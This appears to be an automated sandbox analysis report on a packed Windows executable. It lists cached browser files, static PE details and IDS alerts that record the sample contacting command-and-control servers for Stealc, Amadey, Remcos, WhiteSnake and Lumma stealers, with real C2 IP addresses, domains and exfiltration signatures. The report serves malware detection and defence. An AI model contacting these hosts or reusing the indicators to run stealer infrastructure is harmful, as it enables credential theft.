SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 94

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2586)
Category:	downloaded
Size (bytes):	174097
Entropy (8bit):	5.554845848492248
Encrypted:	false
SSDEEP:	3072:49GysOAIZQy3ZZb6L5BfizRURkgq3ocEs7BB19HDKDSfEISlCMDyQhnF/VU9cpar:49G3IZP3ZZmHfiz+R7q3ocV7BB19HDKq
MD5:	292ACC11525E24B0501DEAC4EB7B61D4
SHA1:	4840E1B06489D1210E25C620AC0E4DEA33F4A574
SHA-256:	A5CB759FC6BF64DD1E35731C88899928B098A359EFF9CA5B34B91F23ADE02C2B
SHA-512:	FBDB4B2B4B647F734B6E05D0495CE1135E9536D611BC567A3B47353FEC986B92412153C214EFE776BC6391239076B3DA6B79851C8BE036C00E4AD026F88CC683
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.ciOLm-Jy21Y.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvi2-a6fPowp_OrDQczHs8e8wA2zQ"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.ej=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var fj,gj,ij,lj,oj,nj,hj,mj;fj=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};gj=function(){_.Ka()};ij=function(){hj===void 0&&(hj=typeof WeakMap==="function"?fj(WeakMap):null);return hj};lj=function(a,b){(_.jj\|\|(_.jj=new hj)).set(a,b);(_.kj\|\|(_.kj=new hj)).set(b,a)};.oj=function(a){if(mj===void 0){const b=new nj([],{});mj=Array.prototype.concat.call([],b).length===1}mj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.pj=function(a,b,c){a=_.zb(a,b,c);return Array.isArray(a)?a:_.Kc};_.qj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.rj=function(a,b){a===0&&(a=_.qj(a,b));return a\|1};_.sj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.tj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.xj=function(a,b,c,d,e,f,g){const h=a.ha;var k=!!(2&b);e=k?1:e;

Chrome Cache Entry: 95

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	133674
Entropy (8bit):	5.432635876719027
Encrypted:	false
SSDEEP:	1536:i7C/VNg17Yp+GhGLhJgJoamyeX43zGiJsKtPLx8OF97f4qlgxCFlOve2dzAcJ82O:fI7vhSJjxeX431PBLx8OF9jlYsci2i6o
MD5:	659757E7B53FF1EF2EA96658F2D6356F
SHA1:	7081F2CCB1AAFCFB938F02CA7297C409232EA76B
SHA-256:	20E3B0476C0F1D6CADDD20FBB4F7DBCFFD3D70706CCFF2B10C4891B3A8D318BB
SHA-512:	C52A8701A94A1F442ABA3789D0F26545EDB8C761F361BDCF6B291EAE47DCB7F5362A07ADD6BC81923F1B5C0708E480779D22B7D8F27B190BE9C81D4BF2B1A3A4
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 96

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1302)
Category:	downloaded
Size (bytes):	117949
Entropy (8bit):	5.4843553913091005
Encrypted:	false
SSDEEP:	3072:D7yvvjOy7sipKTr3dH39oogNLLDzZzS7oF:D7yjOy7LS39mnhS7oF
MD5:	A5D33473ED0997C008D1C053E0773EBE
SHA1:	FEB4CB89145601A0141CC5869BEDF9AE7CD5CB80
SHA-256:	14C27BB0224FCF89A43B444B427DABE3D0AF184CAA7B6B4990CE228C51AE01C1
SHA-512:	3C0A48F9FA05469F950D9A268F1B3E9285A783A555EE597A2E203B688EB0FBCAEA3F4DE9BC8F5381C661007D0C6C4AFA70C19B7826D69A0E2A914A55973D14BD
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);.var da,ea,ha,na,oa,sa,ta,wa;da=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);na=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.gyN29IQRsEA.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTthb_7uL8fi0CBKDba3xi6R0PUU9w"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 98

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.958551329601189
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'163'712 bytes
MD5:	d21a2eb1558c04af68aa39932c381a77
SHA1:	8a1c7f2c06fcf55ccdfb8155a2aa2ec94cb8c5bb
SHA256:	ba62e9e2f8ace5672fbc814db0b5fbd5a2d0a5d2d8ef55fd359e91ac756b4bbc
SHA512:	bffa84774f7857c827702c1f21619f55e4fe7b8fab650b1e8598ab5d5c327b9ddf80724a3be0acb605c5e177b330830276c59e999754fc28809f1781feba2fc7
SSDEEP:	49152:cAt7qwi74aJO4rEuKzGkSolWdSXJi5J51+w:pGz7jGGeE0X2JrV
TLSH:	67A533D04BB3E124D8C826F4665E435D271D9B26878CEEED5844AE358323FF768A34B1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xb38000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F4764BB611Ah
psrad mm4, qword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e9050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2e91f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x2e7000	0x67600	49dab21f84abdf61ee86af42a694fd23	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2e8000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x2e9000	0x1000	0x200	049071433b9f7c843453337b0fd53002	False	0.1328125	data	0.8946074494647072	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x2ea000	0x2a7000	0x200	ceef3edbee0af0de9259aba1e7b3b6e6	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rswsxqeb	0x591000	0x1a6000	0x1a5200	52412803707b9ccecc9d2ee767ae8bae	False	0.9947864490575838	data	7.952971559780101	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ekqrsvgt	0x737000	0x1000	0x600	52d5140ffe603842fc9b4b7b5138bd48	False	0.5696614583333334	data	5.011672229068444	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x738000	0x3000	0x2200	d071838aba45df10be9e20b994987d3a	False	0.05859375	DOS executable (COM)	0.751472981813876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-07T04:12:01.072887+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-07T04:12:01.352927+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-07T04:12:01.420109+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.4	49730	TCP
2024-11-07T04:12:01.693492+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-07T04:12:01.837421+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.4	49730	TCP
2024-11-07T04:12:02.914694+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-07T04:12:03.463518+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-07T04:12:15.939642+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.4	49756	TCP
2024-11-07T04:12:18.577586+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49755	185.215.113.206	80	TCP
2024-11-07T04:12:19.872054+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49755	185.215.113.206	80	TCP
2024-11-07T04:12:20.424612+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49755	185.215.113.206	80	TCP
2024-11-07T04:12:20.989904+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49755	185.215.113.206	80	TCP
2024-11-07T04:12:22.076547+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49755	185.215.113.206	80	TCP
2024-11-07T04:12:22.717612+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49755	185.215.113.206	80	TCP
2024-11-07T04:12:26.835195+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49762	185.215.113.16	80	TCP
2024-11-07T04:12:54.499520+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.4	49763	TCP
2024-11-07T04:13:05.303393+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49799	185.215.113.43	80	TCP
2024-11-07T04:13:08.629711+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49821	31.41.244.11	80	TCP
2024-11-07T04:13:11.961125+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49815	TCP
2024-11-07T04:13:12.882789+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49845	185.215.113.43	80	TCP
2024-11-07T04:13:13.775718+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49851	31.41.244.11	80	TCP
2024-11-07T04:13:17.103060+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49868	194.59.31.120	8452	TCP
2024-11-07T04:13:18.478864+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49869	185.215.113.43	80	TCP
2024-11-07T04:13:18.762640+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49876	194.59.31.120	8452	TCP
2024-11-07T04:13:19.158856+0100	2050601	ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request	1	192.168.2.4	49882	147.124.221.201	8080	TCP
2024-11-07T04:13:19.212160+0100	2050602	ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration	1	192.168.2.4	49882	147.124.221.201	8080	TCP
2024-11-07T04:13:19.391687+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49880	185.215.113.16	80	TCP
2024-11-07T04:13:20.363303+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49887	194.59.31.120	8452	TCP
2024-11-07T04:13:21.983439+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49893	194.59.31.120	8452	TCP
2024-11-07T04:13:22.458173+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.4	60407	1.1.1.1	53	UDP
2024-11-07T04:13:22.484467+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.4	52995	1.1.1.1	53	UDP
2024-11-07T04:13:22.542592+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.4	51086	1.1.1.1	53	UDP
2024-11-07T04:13:22.590409+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.4	61705	1.1.1.1	53	UDP
2024-11-07T04:13:22.979509+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.4	53474	1.1.1.1	53	UDP
2024-11-07T04:13:23.232287+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.4	59704	1.1.1.1	53	UDP
2024-11-07T04:13:23.581125+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49904	194.59.31.120	8452	TCP
2024-11-07T04:13:23.887462+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49906	104.21.5.155	443	TCP
2024-11-07T04:13:23.887462+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49906	104.21.5.155	443	TCP
2024-11-07T04:13:24.105056+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49906	104.21.5.155	443	TCP
2024-11-07T04:13:24.105056+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49906	104.21.5.155	443	TCP
2024-11-07T04:13:24.146553+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49905	185.215.113.43	80	TCP
2024-11-07T04:13:24.877289+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49916	104.21.5.155	443	TCP
2024-11-07T04:13:24.877289+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49916	104.21.5.155	443	TCP
2024-11-07T04:13:25.049524+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49912	185.215.113.16	80	TCP
2024-11-07T04:13:25.219265+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49919	194.59.31.120	8452	TCP
2024-11-07T04:13:25.586875+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49916	104.21.5.155	443	TCP
2024-11-07T04:13:25.586875+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49916	104.21.5.155	443	TCP
2024-11-07T04:13:26.813935+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49930	194.59.31.120	8452	TCP
2024-11-07T04:13:26.980626+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49931	104.21.5.155	443	TCP
2024-11-07T04:13:26.980626+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49931	104.21.5.155	443	TCP
2024-11-07T04:13:27.896375+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49931	104.21.5.155	443	TCP
2024-11-07T04:13:28.410089+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49937	194.59.31.120	8452	TCP
2024-11-07T04:13:29.832389+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49944	104.21.5.155	443	TCP
2024-11-07T04:13:29.832389+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49944	104.21.5.155	443	TCP
2024-11-07T04:13:29.847687+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49943	185.215.113.43	80	TCP
2024-11-07T04:13:30.042435+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49950	194.59.31.120	8452	TCP
2024-11-07T04:13:31.643256+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49957	194.59.31.120	8452	TCP
2024-11-07T04:13:32.482276+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	49963	104.21.5.155	443	TCP
